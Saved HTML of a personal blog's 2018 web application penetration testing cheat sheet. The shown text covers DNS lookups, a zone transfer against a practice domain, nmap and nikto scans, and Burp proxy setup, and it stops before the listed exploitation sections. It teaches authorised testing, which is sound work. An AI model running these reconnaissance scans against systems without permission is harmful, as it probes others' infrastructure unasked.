<!DOCTYPE html>
<html lang="en-US"><meta http-equiv="content-security-policy" content="script-src 'none';worker-src 'none';media-src http: https:;object-src http: https:"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <meta name="generator" content="Jekyll v3.7.3">
  <link type="application/atom+xml" rel="alternate" href="https://jdow.io/feed.xml" title="JDow.io">
  <link rel="alternate" type="application/atom+xml" title="Recent commits to Jekyll’s master branch" href="https://github.com/dow-j/jdow.io/commits/master.atom">
  <link rel="stylesheet" href="web_app_pen_testing_cheat_sheet_files/css.css">
  <link rel="stylesheet" href="web_app_pen_testing_cheat_sheet_files/docsearch.css">
  <link rel="stylesheet" href="web_app_pen_testing_cheat_sheet_files/screen.css">
  <link rel="icon" type="image/x-icon" href="https://jdow.io/favicon.ico">
  <!-- Begin Jekyll SEO tag v2.4.0 -->
<title>Web Application Penetration Testing Cheat Sheet | JDow.io</title>
<meta name="generator" content="Jekyll v3.7.3">
<meta property="og:title" content="Web Application Penetration Testing Cheat Sheet">
<meta name="author" content="dow-j">
<meta property="og:locale" content="en_US">
<meta name="description" content="This cheatsheet is intended to run down the typical steps performed when conducting a web application penetration test. I will break these steps down into sub-tasks and describe the tools I recommend using at each level.">
<meta property="og:description" content="This cheatsheet is intended to run down the typical steps performed when conducting a web application penetration test. I will break these steps down into sub-tasks and describe the tools I recommend using at each level.">
<link rel="canonical" href="https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/">
<meta property="og:url" content="https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/">
<meta property="og:site_name" content="JDow.io">
<meta property="og:type" content="article">
<meta property="article:published_time" content="2018-03-18T09:28:00-04:00">
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="@0xJDow">
<meta name="twitter:creator" content="@dow-j">
<meta name="google-site-verification" content="H-MdKpqki24_rLfdJpmA-mmp058rsddryeOo1mRyYng">
<meta name="msvalidate.01" content="458150BA7AA467A6A35A693CE3117408">
<script type="application/ld+json">
{"description":"This cheatsheet is intended to run down the typical steps performed when conducting a web application penetration test. I will break these steps down into sub-tasks and describe the tools I recommend using at each level.","author":{"@type":"Person","name":"dow-j"},"@type":"BlogPosting","url":"https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/","publisher":{"@type":"Organization","logo":{"@type":"ImageObject","url":"https://jdow.io/img/jdowio.png"},"name":"dow-j"},"headline":"Web Application Penetration Testing Cheat Sheet","dateModified":"2018-03-18T09:28:00-04:00","datePublished":"2018-03-18T09:28:00-04:00","mainEntityOfPage":{"@type":"WebPage","@id":"https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/"},"@context":"http://schema.org"}</script>
<!-- End Jekyll SEO tag -->

  <!--[if lt IE 9]>
  <script src="/js/html5shiv.min.js"></script>
  <script src="/js/respond.min.js"></script>
  <![endif]-->
</head>


<body class="wrap">
  <header>
  <div class="grid">
    <div class="unit one-third center-on-mobiles">
      <h1>
        <a href="https://jdow.io/">
          <span>JDow.io</span>
          <img src="web_app_pen_testing_cheat_sheet_files/jdowio.png" alt="Logo">
        </a>
      </h1>
    </div>
    <nav class="unit two-thirds main-nav hide-on-mobiles">
      <ul>
  <li class="">
    <a href="https://jdow.io/">Home</a>
  </li>
  <li class="current">
    <a href="https://jdow.io/blog/">Blog</a>
  </li>
  <li class="">
    <a href="https://jdow.io/resources/">Resources</a>
  </li>
  <li class="">
    <a href="https://jdow.io/about/">About</a>
  </li>
</ul>

    </nav>
  </div>
  <nav class="mobile-nav show-on-mobiles">
    <ul>
  <li class="">
    <a href="https://jdow.io/">Home</a>
  </li>
  <li class="current">
    <a href="https://jdow.io/blog/">Blog</a>
  </li>
  <li class="">
    <a href="https://jdow.io/resources/">Resources</a>
  </li>
  <li class="">
    <a href="https://jdow.io/about/">About</a>
  </li>
</ul>

  </nav>
</header>

    <section class="news">
    <div class="grid">

      <div class="docs-nav-mobile unit whole show-on-mobiles">
  <select onchange="if (this.value) window.location.href=this.value">
    <option value="" selected="selected">Navigate the blog…</option>
    <option value="/blog/">All Blog Posts</option>
    <optgroup label="Software Development">
      
      <option value="/blog/2017/11/25/setting-up-a-new-mac-for-software-development/">Setting Up a New Mac for Software Development</option>
      
    </optgroup>
    <optgroup label="Information Security">
      
      <option value="/blog/2018/01/14/owasp-top-10-application-security-risks/">OWASP Top 10 2017 – Application Security Risks</option>
      
    </optgroup>
    <optgroup label="Walkthroughs">
      
      <option value="/blog/2018/02/08/mr-robot-1-vulnhub/">Mr Robot 1 Walkthough</option>
      
      <option value="/blog/2017/12/16/overthewire-bandit-wargame-walkthrough/">OverTheWire Bandit Wargame Walkthrough</option>
      
    </optgroup>
    <optgroup label="Cheat Sheets">
      
      <option value="/blog/2018/03/18/web-application-penetration-testing-methodology/">Web Application Penetration Testing Cheat Sheet</option>
      
    </optgroup>
  </select>
</div>


      <div class="unit four-fifths">
        <article>
  <h2>
    Web Application Penetration Testing Cheat Sheet
    <a href="https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/" class="permalink" title="Permalink">∞</a>
  </h2>
  <span class="post-category">
    <span class="label">
      cheat-sheets
    </span>
  </span>
  <div class="post-meta">
    <span class="post-date">
      18 Mar 2018
    </span>
    <a href="https://github.com/dow-j" class="post-author">
      <img class="avatar avatar-small" src="web_app_pen_testing_cheat_sheet_files/dow-j.png" alt="dow-j" srcset="https://avatars0.githubusercontent.com/dow-j?v=3&amp;s=24 1x, https://avatars0.githubusercontent.com/dow-j?v=3&amp;s=48 2x, https://avatars0.githubusercontent.com/dow-j?v=3&amp;s=72 3x, https://avatars0.githubusercontent.com/dow-j?v=3&amp;s=96 4x" data-proofer-ignore="true" width="24" height="24">
      dow-j
    </a>
  </div>
  <div class="post-content">
    <p>This cheatsheet is intended to run down the typical steps 
performed when conducting a web application penetration test. I will 
break these steps down into sub-tasks and describe the tools I recommend
 using at each level.</p>

<!--more-->

<p>Many of the ideas presented in this sheet come from the <strong>fantastic</strong> teachings of <a href="https://lanmaster53.com/">Tim “lanmaster53” Tomes</a>,
 who has kindly allowed me to share them with you here. If you or anyone
 you know is interested in web application penetration testing <a href="https://lanmaster53.com/training">Training</a> I <strong>highly</strong> recommend that you or your company consider Tim.</p>

<p>Please bear in mind that these steps are <strong>iterative</strong> 
so in a typical engagement you can expect to do them multiple times. 
This is particularly true if you manage to traverse different levels of 
access in an application (e.g. elevate from a regular user to an admin).</p>

<p>Finally, throughout this sheet I will heavily discuss tools included in PortSwigger’s <a href="https://portswigger.net/burp">Burp Suite Professional</a>
 which is a paid product intended for professional use. I apologize if 
this dissuades you, but at the price they offer the tool for I consider 
it a bargain.</p>

<ul class="markdown-toc" id="markdown-toc">
  <li><a href="#information-gathering" id="markdown-toc-information-gathering">Information Gathering</a>    <ul>
      <li><a href="#target-validation" id="markdown-toc-target-validation">Target Validation</a>        <ul>
          <li><a href="#domain-registration" id="markdown-toc-domain-registration">Domain Registration</a></li>
          <li><a href="#dns-interrogation" id="markdown-toc-dns-interrogation">DNS Interrogation</a></li>
          <li><a href="#testing-for-zone-transfers" id="markdown-toc-testing-for-zone-transfers">Testing for Zone Transfers</a></li>
        </ul>
      </li>
      <li><a href="#osint-harvesting" id="markdown-toc-osint-harvesting">OSINT Harvesting</a></li>
    </ul>
  </li>
  <li><a href="#mapping" id="markdown-toc-mapping">Mapping</a>    <ul>
      <li><a href="#identify-technologies" id="markdown-toc-identify-technologies">Identify Technologies</a>        <ul>
          <li><a href="#port-scanning-service-fingerprinting-and-os-detection" id="markdown-toc-port-scanning-service-fingerprinting-and-os-detection">Port Scanning, Service Fingerprinting, and OS Detection</a></li>
        </ul>
      </li>
      <li><a href="#browser-and-interception-proxy-setup" id="markdown-toc-browser-and-interception-proxy-setup">Browser and Interception Proxy Setup</a>        <ul>
          <li><a href="#firefox" id="markdown-toc-firefox">Firefox</a>            <ul>
              <li><a href="#firefox-extensions" id="markdown-toc-firefox-extensions">Firefox Extensions</a></li>
              <li><a href="#configure-firefox-for-burp" id="markdown-toc-configure-firefox-for-burp">Configure Firefox for Burp</a></li>
            </ul>
          </li>
          <li><a href="#burp-configuration" id="markdown-toc-burp-configuration">Burp Configuration</a>            <ul>
              <li><a href="#burp-extensions" id="markdown-toc-burp-extensions">Burp Extensions</a></li>
            </ul>
          </li>
        </ul>
      </li>
      <li><a href="#manual-mapping" id="markdown-toc-manual-mapping">Manual Mapping</a></li>
      <li><a href="#automated-mapping" id="markdown-toc-automated-mapping">Automated Mapping</a></li>
      <li><a href="#post-mapping-analysis" id="markdown-toc-post-mapping-analysis">Post-Mapping Analysis</a></li>
    </ul>
  </li>
  <li><a href="#discovery" id="markdown-toc-discovery">Discovery</a>    <ul>
      <li><a href="#transitioning-from-mapping-to-discovery" id="markdown-toc-transitioning-from-mapping-to-discovery">Transitioning from Mapping to Discovery</a></li>
      <li><a href="#content-discovery" id="markdown-toc-content-discovery">Content Discovery</a>        <ul>
          <li><a href="#vulnerability-scanning" id="markdown-toc-vulnerability-scanning">Vulnerability Scanning</a></li>
        </ul>
      </li>
      <li><a href="#forced-browsing" id="markdown-toc-forced-browsing">Forced Browsing</a>        <ul>
          <li><a href="#testing-for-alternative-content" id="markdown-toc-testing-for-alternative-content">Testing for Alternative Content</a></li>
        </ul>
      </li>
      <li><a href="#automated-discovery" id="markdown-toc-automated-discovery">Automated Discovery</a></li>
      <li><a href="#configuration" id="markdown-toc-configuration">Configuration</a>        <ul>
          <li><a href="#default-configurations" id="markdown-toc-default-configurations">Default Configurations</a></li>
          <li><a href="#testing-for-misconfigurations" id="markdown-toc-testing-for-misconfigurations">Testing for Misconfigurations</a></li>
        </ul>
      </li>
      <li><a href="#authentication" id="markdown-toc-authentication">Authentication</a>        <ul>
          <li><a href="#fuzzing-logins" id="markdown-toc-fuzzing-logins">Fuzzing Logins</a></li>
        </ul>
      </li>
      <li><a href="#session-management" id="markdown-toc-session-management">Session Management</a>        <ul>
          <li><a href="#testing-session-tokens-with-burp" id="markdown-toc-testing-session-tokens-with-burp">Testing Session Tokens With Burp</a></li>
        </ul>
      </li>
      <li><a href="#authorization" id="markdown-toc-authorization">Authorization</a>        <ul>
          <li><a href="#testing-access-control" id="markdown-toc-testing-access-control">Testing Access Control</a></li>
        </ul>
      </li>
      <li><a href="#data-validation-testing" id="markdown-toc-data-validation-testing">Data Validation Testing</a>        <ul>
          <li><a href="#sql-injection" id="markdown-toc-sql-injection">SQL Injection</a></li>
          <li><a href="#cross-site-scripting-xss" id="markdown-toc-cross-site-scripting-xss">Cross-site Scripting (XSS)</a></li>
          <li><a href="#xml-injection" id="markdown-toc-xml-injection">XML Injection</a>            <ul>
              <li><a href="#xml-external-entities-xxe" id="markdown-toc-xml-external-entities-xxe">XML External Entities (XXE)</a></li>
            </ul>
          </li>
          <li><a href="#template-injection" id="markdown-toc-template-injection">Template Injection</a></li>
          <li><a href="#os-command-injection" id="markdown-toc-os-command-injection">OS Command Injection</a></li>
          <li><a href="#open-redirection" id="markdown-toc-open-redirection">Open Redirection</a></li>
          <li><a href="#local-file-inclusion-lfi" id="markdown-toc-local-file-inclusion-lfi">Local File Inclusion (LFI)</a></li>
          <li><a href="#remote-file-inclusion-rfi" id="markdown-toc-remote-file-inclusion-rfi">Remote File Inclusion (RFI)</a></li>
        </ul>
      </li>
      <li><a href="#business-logic" id="markdown-toc-business-logic">Business Logic</a></li>
      <li><a href="#encryption-flaws" id="markdown-toc-encryption-flaws">Encryption Flaws</a></li>
      <li><a href="#denial-of-service" id="markdown-toc-denial-of-service">Denial-of-Service</a></li>
      <li><a href="#flash-applications" id="markdown-toc-flash-applications">Flash Applications</a></li>
    </ul>
  </li>
  <li><a href="#testing-web-services" id="markdown-toc-testing-web-services">Testing Web Services</a>    <ul>
      <li><a href="#testing-rest-web-services" id="markdown-toc-testing-rest-web-services">Testing REST Web Services</a></li>
      <li><a href="#testing-soap-web-services" id="markdown-toc-testing-soap-web-services">Testing SOAP Web Services</a></li>
    </ul>
  </li>
  <li><a href="#exploitation" id="markdown-toc-exploitation">Exploitation</a>    <ul>
      <li><a href="#exploitation-scenarios" id="markdown-toc-exploitation-scenarios">Exploitation Scenarios</a></li>
      <li><a href="#exploiting-cross-site-scripting" id="markdown-toc-exploiting-cross-site-scripting">Exploiting Cross-site Scripting</a>        <ul>
          <li><a href="#browser-hyjacking" id="markdown-toc-browser-hyjacking">Browser Hyjacking</a></li>
        </ul>
      </li>
      <li><a href="#exploiting-sql-injection" id="markdown-toc-exploiting-sql-injection">Exploiting SQL injection</a>        <ul>
          <li><a href="#data-extraction" id="markdown-toc-data-extraction">Data Extraction</a></li>
          <li><a href="#offline-password-cracking" id="markdown-toc-offline-password-cracking">Offline Password Cracking</a></li>
          <li><a href="#authentication-bypass" id="markdown-toc-authentication-bypass">Authentication Bypass</a></li>
        </ul>
      </li>
      <li><a href="#cross-site-request-forgery-csrf" id="markdown-toc-cross-site-request-forgery-csrf">Cross-site Request Forgery (CSRF)</a></li>
    </ul>
  </li>
  <li><a href="#closing" id="markdown-toc-closing">Closing</a></li>
</ul>

<h2 id="information-gathering">Information Gathering</h2>

<blockquote>
  <p>In an engagement the goal of information gathering is to gain an understanding of the application from an <strong>outsiders perspective.</strong></p>
</blockquote>

<h3 id="target-validation">Target Validation</h3>

<table>
  <thead>
    <tr><th>Tool</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Whois</td>
      <td>A protocol for searching internet registration databases based on RFC 3912 for domain names, IPs, autonomous systems, etc.</td>
    </tr>
    <tr>
      <td>Dig</td>
      <td>dig (domain information groper) is a network administration command-line tool for querying Domain Name System (DNS) servers.</td>
    </tr>
    <tr>
      <td>DNSRecon</td>
      <td>Tool for automating many DNS enumeration techniques maintained by <a href="https://github.com/darkoperator/dnsrecon">darkoperator</a></td>
    </tr>
  </tbody>
</table>

<h4 id="domain-registration">Domain Registration</h4>

<p>Use the following steps to validate ownership of a target:</p>

<ol>
  <li>Whois the target domains/hosts.
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>whois example.com
</code></pre></div>    </div>
  </li>
  <li>Resolve the IP addresses for the target
domains/hosts.
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dig +short example.com
</code></pre></div>    </div>
  </li>
  <li>Whois the IP addresses.
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>whois 104.27.178.12
</code></pre></div>    </div>
  </li>
  <li>Analyze the results.</li>
</ol>

<p>Results could be mixed depending on whether or not the target is using whois privacy protection.</p>

<div class="note warning">
<h5>Never attack a target that you are not positive you have permission to be testing</h5> 
<p>As a penetration tester it is your responsibility to ensure that you 
have permission from the owner of a target before you start testing it. 
This is why target validation should always be your first step when 
beginning an engagement.</p>
</div>

<h4 id="dns-interrogation">DNS Interrogation</h4>

<p>I like to start off with <a href="https://dnsdumpster.com/">https://dnsdumpster.com/</a> which is a great online tool for getting a quick overview of a target domain’s internet footprint via DNS.</p>

<ul>
  <li>Forward Lookups
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dig +nocmd example.com A +noall +answer
dig +nocmd example.com NS +noall +answer
dig +nocmd example.com MX +noall +answer
dig +nocmd example.com TXT +noall +answer
dig +nocmd example.com SOA +noall +answer
...
dig +nocmd example.com ANY +noall +answer (This rarely works)
</code></pre></div>    </div>
  </li>
  <li>Reverse Lookups
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dig -x 104.27.179.12
dig -x 104.27.178.12
</code></pre></div>    </div>
  </li>
</ul>

<h4 id="testing-for-zone-transfers">Testing for Zone Transfers</h4>

<p>Zone transfers are a DNS transaction used to replicate records 
between DNS servers. It’s rare to find a DNS server these days that 
allow a zone transfer, but it’s something you should check. If you 
succeed in performing a zone transfer, you stand to gain access to all 
of the records of a domain.</p>

<div class="note important">
<h5>DNS Zone Transfer Attacks are <b>EASY</b> to prevent!</h5> 
<p>At the bare-minimum an administrator can whitelist zone transfers to a select group of IP addresses.</p>
</div>

<ul>
  <li>Example using <zonetransfer.me>
</zonetransfer.me>    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dig -t NS zonetransfer.me +short
dig -t AXFR zonetransfer.me @nsztm1.digi.ninja 
dig -t AXFR zonetransfer.me @nsztm2.digi.ninja
</code></pre></div>    </div>
  </li>
  <li>DNSRecon is useful for automating many of the DNS enumeration 
tasks above, and can often find extra information that may have been 
missed.
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>dnsrecon -d example.com
</code></pre></div>    </div>
  </li>
</ul>

<h3 id="osint-harvesting">OSINT Harvesting</h3>

<table>
  <thead>
    <tr><th>Tool</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Recon-NG</td>
      <td>Open source reconnaissance framework created by Tim 'Lanmaster53' Tomes, maintained by a community of developers on <a href="http://recon-ng.com/">http://recon-ng.com/</a></td>
    </tr>
    <tr>
      <td>Maltego</td>
      <td>Maltego is an interactive data mining tool that renders directed graphs for link analysis.</td>
    </tr>
    <tr>
      <td>theharvester</td>
      <td>theHarvester is a tool for gathering e-mail accounts, subdomain names, virtual
hosts, open ports/ banners, and employee names from different public sources</td>
    </tr>
  </tbody>
</table>

<p>I thought about including a detailed section on OSINT in this cheat 
sheet, but at this time I’ve decided not to since I believe it deserves 
its own cheat sheet (perhaps later down the line).</p>

<p>Instead I’d like to point you towards some excellent resources on 
OSINT that I think all pentesters should familiarize themselves with.</p>

<ul>
  <li>Michael Bazzell
    <ul>
      <li><a href="https://inteltechniques.com/">https://inteltechniques.com</a></li>
      <li><a href="https://www.amazon.com/dp/1984201573/ref=as_li_ss_tl?ie=UTF8&amp;qid=1516984461&amp;sr=8-10&amp;keywords=open+source+intelligence+techniques&amp;linkCode=sl1&amp;tag=hookaround-20&amp;linkId=1fc9d5a9d120f07b7ba934120ef485a2">Open Source Intelligence Techniques</a></li>
    </ul>
  </li>
  <li>Google Dorking
    <ul>
      <li><a href="https://www.exploit-db.com/google-hacking-database/">https://www.exploit-db.com/google-hacking-database/</a></li>
    </ul>
  </li>
</ul>

<h2 id="mapping">Mapping</h2>

<blockquote>
  <p>In an engagement the goal of mapping is to gain an understanding of the application from a typical users perspective.</p>
</blockquote>

<h3 id="identify-technologies">Identify Technologies</h3>

<table>
  <thead>
    <tr><th>Tool</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>NMap</td>
      <td>TCP/IP host and port scanning tool with fantastic service and OS fingerprinting capabilities.</td>
    </tr>
  </tbody>
</table>

<h4 id="port-scanning-service-fingerprinting-and-os-detection">Port Scanning, Service Fingerprinting, and OS Detection</h4>

<ul>
  <li>Port scans top 1000 TCP ports.
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap 192.168.100.2
</code></pre></div>    </div>
  </li>
  <li>Ping sweep 8 localhost addresses (actually does an ARP, ICMP, then TCP 80)
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap –sP 192.168.100.0-7
</code></pre></div>    </div>
  </li>
  <li>Port scans TCP ports 80 &amp; 443
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -p 80,443 192.168.100.2
</code></pre></div>    </div>
  </li>
  <li>Port scans top 1000 TCP ports, fingerprints OS and services, then runs NSE scripts
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo nmap -A 192.168.100.2
</code></pre></div>    </div>
  </li>
  <li>Port scans all 65535 TCP ports,  fingerprints them, and runs NSE scripts
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo nmap –A –p- 192.168.100.2
</code></pre></div>    </div>
  </li>
  <li>Port scans top 1000 UDP ports
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo nmap -sU 192.168.100.2
</code></pre></div>    </div>
  </li>
  <li>Port scans all 65535 UDP ports.
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo nmap -sU –p- 192.168.100.2
</code></pre></div>    </div>
  </li>
  <li>Port scans all 65535 UDP ports, fingerprints them, and runs some NSE scripts.
    <div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sudo nmap –sU -p- -A 192.168.100.2
</code></pre></div>    </div>
  </li>
</ul>

<div class="note info">
<h5>Port scanning the web server typically marks the transition from information gathering to mapping.</h5>
<p>Be sure to make note of exposed ports, service versions, and OS/s!</p>
</div>

<h3 id="browser-and-interception-proxy-setup">Browser and Interception Proxy Setup</h3>

<h4 id="firefox">Firefox</h4>

<table>  
  <thead>
    <tr><th>Tool</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Firefox</td>
      <td>Modern, cross-platform, web browser that boasts a large collection of useful extensions.</td>
    </tr>
  </tbody>
</table>

<p><code class="highlighter-rouge">Firefox</code> is typically the 
default choice in browser when it comes to web application penetration 
testing. This is namely because of the amount of useful extensions 
available, and the fact that it doesn’t affect your global proxy 
settings.</p>

<h5 id="firefox-extensions">Firefox Extensions</h5>

<table>  
  <thead>
    <tr><th>Tool</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td><a href="https://addons.mozilla.org/en-US/firefox/addon/uaswitcher/?src=search">User Agent Switcher</a></td>
      <td>Firefox addon that allows for quickly changing the browser's user agent string</td>
    </tr>
    <tr>
      <td><a href="https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/">Wappalyzer</a></td>
      <td>Browser extension that detects various software components and technologies used on websites.</td>
    </tr>
    <tr>
      <td><a href="https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/">FoxyProxy</a></td>
      <td>Web browser proxy switcher</td>
    </tr>
  </tbody>
</table>

<p>These are extensions that I generally use in one way or another in 
every engagement and I recommend installing them prior to mapping.</p>

<h5 id="configure-firefox-for-burp">Configure Firefox for Burp</h5>

<p>Before you can begin mapping the application you must first configure your browser to proxy traffic through <code class="highlighter-rouge">Burp</code></p>

<ul>
  <li>In <code class="highlighter-rouge">Firefox</code>
    <ul>
      <li>Configure the <code class="highlighter-rouge">FoxyProxy</code> extension with a proxy for Burp Suite
        <ul>
          <li>IP: <code class="highlighter-rouge">127.0.0.1</code></li>
          <li>Port: <code class="highlighter-rouge">8080</code></li>
        </ul>
      </li>
      <li>Configure <code class="highlighter-rouge">Firefox</code> to trust Burp’s dynamic SSL certificates
        <ul>
          <li>Open <a href="http://burp/">http://burp/</a></li>
          <li>Save the certificate</li>
          <li>Import the certificate into <code class="highlighter-rouge">Firefox</code></li>
        </ul>
      </li>
    </ul>
  </li>
</ul>

<h4 id="burp-configuration">Burp Configuration</h4>

<table>  
  <thead>
    <tr><th>Tool</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Burp Suite Pro</td>
      <td>Integrated platform for performing security testing of web applications.</td>
    </tr>
  </tbody>
</table>

<p>You should customize Burp so that it suites your preferences. But, at the very least I recommend setting the <code class="highlighter-rouge">Scan Speed</code> to <code class="highlighter-rouge">thorough</code>
 since you will typically be using the scanner sparingly and this way it
 will make more requests and check for more vulnerabilities when it is 
being used.</p>

<h5 id="burp-extensions">Burp Extensions</h5>

<table>  
  <thead>
    <tr><th>Tool</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Burp Extender</td>
      <td>API for expanding the functionality of Burp suite, extensions available within the BApp store.</td>
    </tr>
    <tr>
      <td>Retire.js (BApp)</td>
      <td>Burp suite extension used to detect vulnerabilities in outdated JavaScript components.</td>
    </tr>
    <tr>
      <td>Wsdler (BApp)</td>
      <td>Burp suite extension that parses WSDL files to create sample requests for all available methods</td>
    </tr>
    <tr>
      <td>Python Scripter (BApp)</td>
      <td>Executes a custom python script on each HTTP request and response by processed by Burp.</td>
    </tr>
  </tbody>
</table>

<p>These are the <code class="highlighter-rouge">Burp</code> extensions that I typically use in most engagements. Much like the <code class="highlighter-rouge">Firefox</code> extensions I like to have them installed prior to mapping the application.</p>

<p>These are installed using the <code class="highlighter-rouge">Burp Extender</code> module within Burp Suite Pro.</p>

<h3 id="manual-mapping">Manual Mapping</h3>

<p>Manual enumeration of the web application is perhaps the most 
important part of the mapping process. It’s imperative that you visit 
every page, follow every link, and perform every iteration with the 
application that you possibly can in order to establish a 
request/response baseline in Burp’s sitemap.</p>

<div class="note important">
<h5>Manual mapping is critical for Single Page Apps</h5>
<p>Automatic spidering often fails when it comes to mapping single page 
applications due to the fact that most HTTP requests are sent 
asynchronously via JavaScript (AJAX).</p>
</div>

<h3 id="automated-mapping">Automated Mapping</h3>

<p>Automated Mapping is done using <code class="highlighter-rouge">Burp Spider</code>
 and can be useful in finding additional pages that you normally 
wouldn’t find during manual enumeration. Typically Burp Spider will find
 more pages in legacy applications than in more-modern SPAs.</p>

<div class="note warning">
<h5>Automated Spidering is dangerous</h5>
<p>Depending on the situation I will map anywhere from 80% to 95% of the
 target
application manually and only use the spider in very specific 
situations. This is because the spider can potentially be destructive in
 certain situations.</p>
</div>

<h3 id="post-mapping-analysis">Post-Mapping Analysis</h3>

<p>At this point you should have the first iteration of the sitemap of the application you’re testing in <code class="highlighter-rouge">Burp</code> and you should make note of what you’ve identified thus far.</p>

<p><strong>Specifics you should make note of:</strong></p>
<ul>
  <li>Web server</li>
  <li>Application Architecture (Tech Stack)</li>
  <li>Programming Language/s</li>
  <li>Frameworks</li>
  <li>Design Patterns</li>
</ul>

<p>This is also a good time to make note of any areas of the application
 where you are expected to complete a series of actions in a certain 
order. Oftentimes these processes can be manipulated and executed out of
 order and can possibly lead to significant findings (e.g. e-commerce 
checkout experience, password reset form, etc.).</p>

<h2 id="discovery">Discovery</h2>

<blockquote>
  <p>In an engagement the goal of discovery is to gain an understanding of the application from an <strong>attackers perspective.</strong></p>
</blockquote>

<h3 id="transitioning-from-mapping-to-discovery">Transitioning from Mapping to Discovery</h3>

<p>It’s generally time to transition from mapping to discovery after 
you’ve established your sitemap, and conducted some initial functional 
analysis of the target. At this point you’re going to be looking to 
identify as many vulnerabilities in the target application as possible. 
This includes, not only, <a href="https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project">The OWASP Top 10</a>
 but also flaws in application business logic. Bear in mind that you 
will encounter a myriad of vulnerabilities that do not fit nicely into 
one specific category so you should always be vigilant.</p>

<h3 id="content-discovery">Content Discovery</h3>

<h4 id="vulnerability-scanning">Vulnerability Scanning</h4>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Nikto</td>
      <td>Web server vulnerability scanner with fantastic fingerprinting capabilities.</td>
    </tr>
  </tbody>
</table>

<p><code class="highlighter-rouge">Nikto</code> is among the best when 
it comes to vulnerability scanners and does an excellent job at 
identifying vulnerabilities in the target application. It also has a <code class="highlighter-rouge">-Format</code> switch to easily export the scan results into a format that is easy to read and refer to later on.</p>

<p><strong>Scan the target &amp; output results into HTML format for easier readability.</strong></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nikto -h http://example.com -output ~/nikto.html -Format htm
</code></pre></div></div>

<div class="note info">
<h5>Vulnerability scanning with Nikto will typically mark the transition from mapping to discovery.</h5>
<p>Once you have the results of your scan it's important to take the time to review them and visit any page/s that stand out</p>
</div>

<h3 id="forced-browsing">Forced Browsing</h3>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Burp Engagement Tools</td>
      <td>A set of special purpose tools built into Burp Suite Pro that apply to specific resources</td>
    </tr>
    <tr>
      <td>Engagement Tool: Discover Content</td>
      <td>Forced borwsing tool built into Burp Suite Pro</td>
    </tr>
    <tr>
      <td>Burp Intruder</td>
      <td>Burp suite tool used to automate customized attacks against web applications (e.g. brute forcing, injection, etc.)</td>
    </tr>
    <tr> 
      <td>FuzzDB</td>
      <td>Open source database of malicious inputs, predictable resource
 names, greppable strings for server response messages, and other 
resources like web shells</td>
    </tr>
  </tbody>
</table>

<p>Forced browsing is a discovery technique for identifying resources 
that are not referenced by the target application, but are reachable 
nonetheless. <code class="highlighter-rouge">Discover Content</code> is a <code class="highlighter-rouge">Burp</code> tool that exists specifically for this purpose. Additionally, <code class="highlighter-rouge">Burp Intruder</code>
 can also be used for forced browsing by conducting a dictionary attack 
against the target (usually by injecting into url parameters or file 
paths). <code class="highlighter-rouge">FuzzDB</code> contains some excellent wordlists for this purpose, specifically take a look at the <a href="https://github.com/fuzzdb-project/fuzzdb/tree/master/discovery">discovery</a> section for wordlists for the purpose of forced browsing.</p>

<h4 id="testing-for-alternative-content">Testing for Alternative Content</h4>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>User Agent Switcher</td>
      <td>Firefox addon that allows for quickly changing the browser's user agent string</td>
    </tr>
    <tr>
      <td>Burp Intruder</td>
      <td>Burp suite tool used to automate customized attacks against web applications (e.g. brute forcing, injection, etc.)</td>
    </tr>
    <tr> 
      <td>FuzzDB</td>
      <td>Open source database of malicious inputs, predictable resource
 names, greppable strings for server response messages, and other 
resources like web shells</td>
    </tr>
  </tbody>
</table>

<p>One thing I really like to do early on during the discovery process is to try different user agents on certain pages using the <code class="highlighter-rouge">User Agent Switcher</code> extension for <code class="highlighter-rouge">Firefox</code>. This extension does exactly what it sounds like and changes the <code class="highlighter-rouge">User-Agent</code>
 request header to the one you select in the extension. This is because 
some applications are written to respond differently to different <code class="highlighter-rouge">User-Agent</code> and <code class="highlighter-rouge">Referer</code> headers.</p>

